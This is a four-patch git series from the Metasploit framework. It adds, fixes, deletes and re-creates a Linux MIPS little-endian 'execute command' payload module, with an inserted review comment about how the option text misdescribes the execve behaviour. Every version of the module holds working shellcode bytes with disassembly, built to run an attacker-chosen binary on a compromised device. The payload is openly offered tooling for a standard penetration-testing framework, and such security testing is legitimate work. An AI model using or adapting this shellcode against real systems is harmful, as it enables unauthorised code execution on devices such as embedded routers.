From f39e784d1963e5d27fc8e221ed5345c59b0ab625 Mon Sep 17 00:00:00 2001
From: Michael Messner
Date: Wed, 12 Mar 2014 21:08:40 +0100
Subject: [PATCH 1/4] mipsle execve payload
---
 .../payloads/singles/linux/mipsle/execve.rb | 70 +++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 modules/payloads/singles/linux/mipsle/execve.rb
diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb
new file mode 100644
index 0000000000..612d30955a
--- /dev/null
+++ b/modules/payloads/singles/linux/mipsle/execve.rb
@@ -0,0 +1,70 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Linux CMD Execve Payload',
+ 'Description' => %q{
+ A very small shellcode for executing commands.
+ This module is sometimes helpfull for testing purposes.
+ },
+ 'Author' =>
+ [
+ 'Michael Messner ', #metasploit payload
+ 'entropy@phiral.net' #original payload
+ ],
+ 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'Payload' =>
+ {
+ 'Offsets' => {} ,
+ 'Payload' => ''
+ })
+ )
+ register_options(
+ [
+ OptString.new('CMD', [ true, "The command string to execute" ]),
+ ], self.class)
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ return datastore['CMD'] || ''
+ end
+
+ def generate
+
+ shellcode =
+ "\x66\x06\x06\x24" + # li a2,1638
+ "\xff\xff\xd0\x04" + # bltzal a2,4100b4
+ "\xff\xff\x06\x28" + # slti a2,zero,-1
+ "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
+ "\x01\x10\xe4\x27" + # addiu a0,ra,4097
+ "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065
+ "\xe8\xff\xa4\xaf" + # sw a0,-24(sp)
+ "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
+ "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
+ "\xab\x0f\x02\x24" + # li v0,4011
+ "\x0c\x01\x01\x01" # + syscall 0x40404
+
+ #
+ # Constructs the payload
+ #
+ return super + shellcode + command_string
+
+ end
+
+end
From 8db5d854c28aa6899adb5d73d037ade36c8d77cd Mon Sep 17 00:00:00 2001
From: Michael Messner
Date: Thu, 13 Mar 2014 18:38:27 +0100
Subject: [PATCH 2/4] typo, null terminator
---
 modules/payloads/singles/linux/mipsle/execve.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)
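Review bot: The Description ("executing commands") and the CMD option text `"The command string to execute"` promise more than the stub does: per the inline disassembly the two `sw` stores build `argv = [a0, NULL]`, `slti a2,zero,-1` leaves a2 (envp) at 0 and `li v0,4011` is the o32 execve number, so CMD is handed to execve verbatim as a single path with no arguments and no shell, and a value like `/bin/ls -la` would be looked up as one file name. I would make that explicit in the option, e.g. `OptString.new('CMD', [ true, "Path of the binary to execve (no arguments, no shell)" ]),`, or add a sentence saying the same to the Description. `'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/']` also looks flat where the framework's info hash takes one array per reference — `'References' => [ ['URL', 'http://www.exploit-db.com/exploits/17940/'] ],` — please confirm against neighbouring payload modules. Minor: the `+` inside `# + syscall 0x40404` reads like a continuation operator (`"\x0c\x01\x01\x01"   # syscall 0x40404` is clearer), and the header comment's `http//metasploit.com/download` is missing its colon. All of this applies equally to the re-created file in PATCH 4/4 (modules/payloads/singles/linux/mipsle/exec.rb).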
diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb
index 612d30955a..def99ef80c 100644
--- a/modules/payloads/singles/linux/mipsle/execve.rb
+++ b/modules/payloads/singles/linux/mipsle/execve.rb
@@ -15,7 +15,7 @@ module Metasploit3
 'Name' => 'Linux CMD Execve Payload',
 'Description' => %q{
 A very small shellcode for executing commands.
- This module is sometimes helpfull for testing purposes.
+ This module is sometimes helpful for testing purposes.
 },
 'Author' =>
 [
@@ -63,7 +63,7 @@ module Metasploit3
 #
 # Constructs the payload
 #
- return super + shellcode + command_string
+ return super + shellcode + command_string + "\x00"

 end

From a9952fa2949009113e9edf6752728e4859a9b215 Mon Sep 17 00:00:00 2001
From: Michael Messner
Date: Tue, 25 Mar 2014 09:11:16 +0100
Subject: [PATCH 3/4] change name and filename
---
 .../payloads/singles/linux/mipsle/execve.rb | 70 -------------------
 1 file changed, 70 deletions(-)
 delete mode 100644 modules/payloads/singles/linux/mipsle/execve.rb
diff --git a/modules/payloads/singles/linux/mipsle/execve.rb b/modules/payloads/singles/linux/mipsle/execve.rb
deleted file mode 100644
index def99ef80c..0000000000
--- a/modules/payloads/singles/linux/mipsle/execve.rb
+++ /dev/null
@@ -1,70 +0,0 @@
-##
-# This module requires Metasploit: http//metasploit.com/download
-# Current source: https://github.com/rapid7/metasploit-framework
-##
-
-require 'msf/core'
-
-module Metasploit3
-
- include Msf::Payload::Single
- include Msf::Payload::Linux
-
- def initialize(info = {})
- super(merge_info(info,
- 'Name' => 'Linux CMD Execve Payload',
- 'Description' => %q{
- A very small shellcode for executing commands.
- This module is sometimes helpful for testing purposes.
- },
- 'Author' =>
- [
- 'Michael Messner ', #metasploit payload
- 'entropy@phiral.net' #original payload
- ],
- 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'],
- 'License' => MSF_LICENSE,
- 'Platform' => 'linux',
- 'Arch' => ARCH_MIPSLE,
- 'Payload' =>
- {
- 'Offsets' => {} ,
- 'Payload' => ''
- })
- )
- register_options(
- [
- OptString.new('CMD', [ true, "The command string to execute" ]),
- ], self.class)
- end
-
- #
- # Returns the command string to use for execution
- #
- def command_string
- return datastore['CMD'] || ''
- end
-
- def generate
-
- shellcode =
- "\x66\x06\x06\x24" + # li a2,1638
- "\xff\xff\xd0\x04" + # bltzal a2,4100b4
- "\xff\xff\x06\x28" + # slti a2,zero,-1
- "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
- "\x01\x10\xe4\x27" + # addiu a0,ra,4097
- "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065
- "\xe8\xff\xa4\xaf" + # sw a0,-24(sp)
- "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
- "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
- "\xab\x0f\x02\x24" + # li v0,4011
- "\x0c\x01\x01\x01" # + syscall 0x40404
-
- #
- # Constructs the payload
- #
- return super + shellcode + command_string + "\x00"
-
- end
-
-end
From 50efd0b5d05917d70a7db9e85cd46074ab7871be Mon Sep 17 00:00:00 2001
From: Michael Messner
Date: Tue, 25 Mar 2014 09:13:04 +0100
Subject: [PATCH 4/4] change name and filename and file included
---
 modules/payloads/singles/linux/mipsle/exec.rb | 70 +++++++++++++++++++
 1 file changed, 70 insertions(+)
 create mode 100644 modules/payloads/singles/linux/mipsle/exec.rb
diff --git a/modules/payloads/singles/linux/mipsle/exec.rb b/modules/payloads/singles/linux/mipsle/exec.rb
new file mode 100644
index 0000000000..b77a0b0e6d
--- /dev/null
+++ b/modules/payloads/singles/linux/mipsle/exec.rb
@@ -0,0 +1,70 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Payload::Linux
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Linux Execute Command',
+ 'Description' => %q{
+ A very small shellcode for executing commands.
+ This module is sometimes helpful for testing purposes.
+ },
+ 'Author' =>
+ [
+ 'Michael Messner ', #metasploit payload
+ 'entropy@phiral.net' #original payload
+ ],
+ 'References' => ['URL', 'http://www.exploit-db.com/exploits/17940/'],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'linux',
+ 'Arch' => ARCH_MIPSLE,
+ 'Payload' =>
+ {
+ 'Offsets' => {} ,
+ 'Payload' => ''
+ })
+ )
+ register_options(
+ [
+ OptString.new('CMD', [ true, "The command string to execute" ]),
+ ], self.class)
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ return datastore['CMD'] || ''
+ end
+
+ def generate
+
+ shellcode =
+ "\x66\x06\x06\x24" + # li a2,1638
+ "\xff\xff\xd0\x04" + # bltzal a2,4100b4
+ "\xff\xff\x06\x28" + # slti a2,zero,-1
+ "\xe0\xff\xbd\x27" + # addiu sp,sp,-32
+ "\x01\x10\xe4\x27" + # addiu a0,ra,4097
+ "\x1f\xf0\x84\x24" + # addiu a0,a0,-4065
+ "\xe8\xff\xa4\xaf" + # sw a0,-24(sp)
+ "\xec\xff\xa0\xaf" + # sw zero,-20(sp)
+ "\xe8\xff\xa5\x27" + # addiu a1,sp,-24
+ "\xab\x0f\x02\x24" + # li v0,4011
+ "\x0c\x01\x01\x01" # + syscall 0x40404
+
+ #
+ # Constructs the payload
+ #
+ return super + shellcode + command_string + "\x00"
+
+ end
+
+end